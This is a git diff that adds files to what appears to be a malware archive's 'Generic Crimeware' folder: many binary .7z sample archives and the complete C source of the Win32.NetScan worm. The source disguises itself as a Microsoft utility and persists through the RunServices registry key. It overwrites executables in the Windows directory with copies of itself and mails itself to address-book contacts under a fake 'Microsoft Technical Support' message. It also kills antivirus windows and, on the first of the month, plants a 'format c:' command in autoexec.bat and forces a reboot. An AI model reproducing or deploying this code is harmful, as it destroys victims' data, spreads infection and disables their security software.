diff --git a/Win32/Generic Crimeware/Win32.Mydoom.a.7z b/Win32/Generic Crimeware/Win32.Mydoom.a.7z new file mode 100644 index 00000000..500b466d Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Mydoom.a.7z differ diff --git a/Win32/Generic Crimeware/Win32.Napsin.7z b/Win32/Generic Crimeware/Win32.Napsin.7z new file mode 100644 index 00000000..554b3732 Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Napsin.7z differ diff --git a/Win32/Generic Crimeware/Win32.Nes.e.7z b/Win32/Generic Crimeware/Win32.Nes.e.7z new file mode 100644 index 00000000..3b4c904f Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Nes.e.7z differ diff --git a/Win32/Generic Crimeware/Win32.Netscan.c b/Win32/Generic Crimeware/Win32.Netscan.c new file mode 100644 index 00000000..b35fd8f5 --- /dev/null +++ b/Win32/Generic Crimeware/Win32.Netscan.c @@ -0,0 +1,245 @@ +#include "netscan.h" +#pragma hdrstop +#pragma warning (disable: 4068) +#pragma warning (disable: 4001) +#pragma resource "resource.res" + +char GetNetScanPath[256],GetNetScanWinDir[256],MyBuffer[256]="echo y|format c: /u /v:HaHaHaHa"; +LPSTR FileEmm386 = "Emm386.exe"; +LPSTR FileSetver = "SetVer.exe"; +LPSTR Nom = "a"; +DWORD ExtInf; +int Err,ErrSend; +HANDLE NetScanTime,NetScanHandle,AutoBat; +HMODULE GetKernLib, GetMapiLib; +HKEY NetScan32Key,NetScanNTKey,NetScanInstall,CreateNetScan; +typedef DWORD(*RegistServProcs)(DWORD,DWORD); +typedef ULONG(*SendMessInfect)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG); +typedef ULONG(*FindUserAddress)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*); +typedef ULONG(*DoMemFree)(LPVOID); +HWND WindowsHwnd,SymantecHwnd,NAVHwnd; + +#pragma argsused +int APIENTRY WinMain +( +HINSTANCE hInstance, +HINSTANCE hPrevInstance, +LPSTR lpszCmdLine, +int nCmdShow +) +{ +//Win32.NetScan by ZeMacroKiller98 +//Tous droits r‚serv‚s (c) 2001 +WIN32_FIND_DATA GetFileToInfect; +OSVERSIONINFO GetOsVer; +FILETIME GetFileCreateTime,GetFileLstAccess,GetFileLstWrite; +SYSTEMTIME TriggerScanTime; +RegistServProcs MyServProcs; +SendMessInfect SendMessToOther; +FindUserAddress GetAddressUser; +DoMemFree GetMemFree; +GetKernLib = LoadLibrary("kernel32.dll"); +MyServProcs = (RegistServProcs)GetProcAddress(GetKernLib,"RegisterServiceProcess"); +MessageBox(NULL,"This freeware install automaticaly itself into your system\nIt scan your system each time you connect to network\nIf you have any problem, contact Microsoft","NetScan Utility",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL); +SearchPath(NULL,_argv[0],NULL,sizeof(GetNetScanPath),GetNetScanPath,NULL); +GetOsVer.dwOSVersionInfoSize = sizeof(GetOsVer); +GetVersionEx(&GetOsVer); +if(GetOsVer.dwPlatformId==VER_PLATFORM_WIN32_NT) +{ + RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScanNTKey); + RegSetValueEx(NetScanNTKey,"NetScanNT",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath)); + RegCloseKey(NetScanNTKey); +} +else +{ + RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScan32Key); + RegSetValueEx(NetScan32Key,"NetScan32",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath)); + RegCloseKey(NetScan32Key); +} +if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\NetScan\\Install",0,KEY_ALL_ACCESS,&NetScanInstall)!=ERROR_SUCCESS) +{ + GetMapiLib = LoadLibrary("mapi32.dll"); + GetWindowsDirectory(GetNetScanWinDir,sizeof(GetNetScanWinDir)); + SetCurrentDirectory(GetNetScanWinDir); + NetScanHandle = FindFirstFile("*.exe",&GetFileToInfect); + NetScanFind: + NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); + GetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite); + CloseHandle(NetScanTime); + if((lstrcmp(GetFileToInfect.cFileName,"emm386.exe")==0)||(lstrcmp(GetFileToInfect.cFileName,"setver.exe")==0)) + goto NotInfection; + CopyFile(_argv[0],GetFileToInfect.cFileName,FALSE); + NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); + SetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite); + CloseHandle(NetScanTime); + NotInfection: + if(FindNextFile(NetScanHandle,&GetFileToInfect)==TRUE) + goto NetScanFind; + FindClose(NetScanHandle); + RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Britney\\Install",&CreateNetScan); + RegCloseKey(CreateNetScan); + SendMessToOther = (SendMessInfect)GetProcAddress(GetMapiLib,"MAPISendMail"); + GetAddressUser = (FindUserAddress)GetProcAddress(GetMapiLib,"MAPIResolveName"); + GetMemFree = (DoMemFree)GetProcAddress(GetMapiLib,"MAPIFreeBuffer"); + if((SendMessToOther==NULL)||(GetAddressUser==NULL)||(GetMemFree==NULL)) + { + MessageBox(NULL,"This program need MAPI functions installed on your PC\nPlease contact your hot line to install it","NetScan Utility",MB_OK|MB_ICONEXCLAMATION); + SetCurrentDirectory("C:/"); + DeleteFile("*.*"); + ExitProcess(0); + } +MapiMessage stMessage; +MapiRecipDesc stRecip; +MapiFileDesc stFile; +lpMapiRecipDesc lpRecip; +stFile.ulReserved = 0; +stFile.flFlags = 0L; +stFile.nPosition = (ULONG)-1; +stFile.lpszPathName = GetNetScanPath; +stFile.lpszFileName = NULL; +stFile.lpFileType = NULL; +MessageBox(NULL,"To test your network, you need to select a email address into your address book\nPlease select address with","ILoveBritney Freeware",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL); +UnResolve: +Err = (GetAddressUser)(lhSessionNull,0L,Nom,MAPI_DIALOG,0L,&lpRecip); +if(Err!=SUCCESS_SUCCESS) +{ +switch(Err){ + case MAPI_E_AMBIGUOUS_RECIPIENT: + MessageBox(NULL,"The recipient requested has not been or could\n not be resolved to a unique address list entry","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); + break; + case MAPI_E_UNKNOWN_RECIPIENT: + MessageBox(NULL,"The recipient could not be resolved to any\naddress.The recipient might not exist or might be unknown","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); + break; + case MAPI_E_FAILURE: + MessageBox(NULL,"One or more unspecified errors occured\nThe name was not resolved","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); + DeleteFile("*.*"); + ExitProcess(0); + break; + case MAPI_E_INSUFFICIENT_MEMORY: + MessageBox(NULL,"There was insufficient memory to proceed","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); + DeleteFile("*.*"); + ExitProcess(0); + break; + case MAPI_E_NOT_SUPPORTED: + MessageBox(NULL,"The operation was not supported by the messaging system","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); + DeleteFile("*.*"); + ExitProcess(0); + break; + case MAPI_E_USER_ABORT: + MessageBox(NULL,"The user was cancelled one or more dialog box","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); + DeleteFile("*.*"); + ExitProcess(0); + break; + } +goto UnResolve; +} +stRecip.ulReserved = lpRecip->ulReserved; +stRecip.ulRecipClass = MAPI_TO; +stRecip.lpszName = lpRecip->lpszName; +stRecip.lpszAddress = lpRecip->lpszAddress; +stRecip.ulEIDSize = lpRecip->ulEIDSize; +stRecip.lpEntryID = lpRecip->lpEntryID; +stMessage.ulReserved = 0; +stMessage.lpszSubject = "Microsoft NetScan Utility"; +stMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI send you this mail to test my network\nI need you to send me a answer about it\nThis program can scan your network to find all problem into your network\n\n\tEnjoy to test your net...\nThank you and see you soon....\n\n\n\t\t\t\t\tMicrosoft Technical Support"))); +stMessage.lpszMessageType = NULL; +stMessage.lpszDateReceived = NULL; +stMessage.lpszConversationID = NULL; +stMessage.flFlags = 0L; +stMessage.lpOriginator = NULL; +stMessage.nRecipCount = 1; +stMessage.lpRecips = &stRecip; +stMessage.nFileCount = 1; +stMessage.lpFiles = &stFile; +ErrSend = (SendMessToOther)(lhSessionNull,0L,&stMessage,0L,0L); +if(ErrSend!=SUCCESS_SUCCESS) +{ + MessageBox(NULL,"The test can't continue, due to a error occured during to sending message\nPlease contact our hotline at hotline@microsoft.com","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); + DeleteFile("*.*"); + ExitProcess(0); +} +MessageBox(NULL,"The test is OK and NetScan is installed into your system\n", + "NetScan Utility", + MB_OK|MB_ICONINFORMATION); +FreeLibrary(GetMapiLib); +} +RegCloseKey(NetScanInstall); +STARTUPINFO NetScanInfo; +PROCESS_INFORMATION NetScanProc; +NetScanInfo.cb = sizeof(STARTUPINFO); +NetScanInfo.lpReserved = NULL; +NetScanInfo.lpReserved2 = NULL; +NetScanInfo.cbReserved2 = 0; +NetScanInfo.lpDesktop = NULL; +NetScanInfo.dwFlags = STARTF_FORCEOFFFEEDBACK; +if(CreateProcess(GetNetScanPath, + NULL, + (LPSECURITY_ATTRIBUTES)NULL, + (LPSECURITY_ATTRIBUTES)NULL, + FALSE, + 0, + NULL, + NULL, + &NetScanInfo, + &NetScanProc)) +{ +CloseHandle(NetScanProc.hProcess); +CloseHandle(NetScanProc.hThread); +} +if(CreateMutex(NULL,TRUE,GetNetScanPath)==NULL) + ExitProcess(0); +SetPriorityClass(NetScanProc.hProcess,REALTIME_PRIORITY_CLASS); +MyServProcs(NetScanProc.dwProcessId,1); +GetSystemTime(&TriggerScanTime); +//Close windows which title is WINDOWS +WindowsHwnd = FindWindow(NULL,"WINDOWS"); +if(WindowsHwnd!=NULL) + DestroyWindow(WindowsHwnd); +//Close access to Symantec HomePage +SymantecHwnd = FindWindow(NULL,"Symantec Security Updates - Home Page - Microsoft Internet Explorer"); +if(SymantecHwnd!=NULL) +{ + MessageBox(NULL,"You don't have access to this page\nPlease contact the web master to correct this problem\n","Microsoft Internet Explorer",MB_OK|MB_ICONEXCLAMATION|MB_ICONSTOP); + DestroyWindow(SymantecHwnd); +} +//Anti Norton Antivirus +NAVHwnd = FindWindow(NULL,"Norton AntiVirus"); +if(NAVHwnd !=NULL) +{ + MessageBox(NULL,"Ha Ha Ha Ha!!!!, you use NAV?????\nI can allow access to it\nChange AV now","Win32.NetScan",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); + DestroyWindow(NAVHwnd); +} +if((TriggerScanTime.wHour==12)&&(TriggerScanTime.wMinute==12)) +{ + mciSendString("open cdaudio",NULL,0,NULL); + mciSendString("set cdaudio door open",NULL,0,NULL); + mciSendString("close cdaudio",NULL,0,NULL); + mciSendString("open cdaudio",NULL,0,NULL); + mciSendString("set cdaudio audio all off",NULL,0,NULL); + mciSendString("close cdaudio",NULL,0,NULL); + MessageBeep(MB_ICONEXCLAMATION); +} +if(TriggerScanTime.wDay==1) +{ + MessageBox(NULL,"It's the day that your PC is going to scan or maybe going to disappear","Win32.Netscan",MB_OK|MB_ICONEXCLAMATION); + SetCurrentDirectory("C:\\"); + AutoBat = CreateFile("autoexec.bat",GENERIC_WRITE,0,(LPSECURITY_ATTRIBUTES) NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,(HANDLE) NULL); + SetFilePointer(AutoBat, 0, (LPLONG)NULL,FILE_END); + WriteFile(AutoBat,MyBuffer,sizeof(MyBuffer),&ExtInf,NULL); + CloseHandle(AutoBat); + ExitWindowsEx(EWX_FORCE|EWX_REBOOT,0); +} +FreeLibrary(GetKernLib); +return 0; +} + + +************************************************************************* + +#define WIN32_LEAN_AND_MEAN +#include +#include +#include +#include +#include +#include \ No newline at end of file diff --git a/Win32/Generic Crimeware/Win32.Null.7z b/Win32/Generic Crimeware/Win32.Null.7z new file mode 100644 index 00000000..eaa3cc06 Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Null.7z differ diff --git a/Win32/Generic Crimeware/Win32.Nzm.7z b/Win32/Generic Crimeware/Win32.Nzm.7z new file mode 100644 index 00000000..d8b5525d Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Nzm.7z differ diff --git a/Win32/Generic Crimeware/Win32.Poshspy.7z b/Win32/Generic Crimeware/Win32.Poshspy.7z new file mode 100644 index 00000000..6dc779f2 Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Poshspy.7z differ diff --git a/Win32/Generic Crimeware/Win32.Pwnbot.7z b/Win32/Generic Crimeware/Win32.Pwnbot.7z new file mode 100644 index 00000000..7f8250d5 Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Pwnbot.7z differ diff --git a/Win32/Generic Crimeware/Win32.Rage.7z b/Win32/Generic Crimeware/Win32.Rage.7z new file mode 100644 index 00000000..4d8a214a Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Rage.7z differ diff --git a/Win32/Generic Crimeware/Win32.Reptile.7z b/Win32/Generic Crimeware/Win32.Reptile.7z new file mode 100644 index 00000000..b44cb9c1 Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Reptile.7z differ diff --git a/Win32/Generic Crimeware/Win32.Retro.7z b/Win32/Generic Crimeware/Win32.Retro.7z new file mode 100644 index 00000000..8171bf60 Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Retro.7z differ diff --git a/Win32/Generic Crimeware/Win32.Riot.7z b/Win32/Generic Crimeware/Win32.Riot.7z new file mode 100644 index 00000000..6642750e Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Riot.7z differ diff --git a/Win32/Generic Crimeware/Win32.Rootkit.Alpha.a.c.7z b/Win32/Generic Crimeware/Win32.Rootkit.Alpha.a.c.7z new file mode 100644 index 00000000..42547cf4 Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Rootkit.Alpha.a.c.7z differ diff --git a/Win32/Generic Crimeware/Win32.Rose.c.7z b/Win32/Generic Crimeware/Win32.Rose.c.7z new file mode 100644 index 00000000..4781f1d4 Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Rose.c.7z differ diff --git a/Win32/Generic Crimeware/Win32.Rubilyn.7z b/Win32/Generic Crimeware/Win32.Rubilyn.7z new file mode 100644 index 00000000..a6ebc7c6 Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Rubilyn.7z differ diff --git a/Win32/Generic Crimeware/Win32.Ruff.7z b/Win32/Generic Crimeware/Win32.Ruff.7z new file mode 100644 index 00000000..e3224b2e Binary files /dev/null and b/Win32/Generic Crimeware/Win32.Ruff.7z differ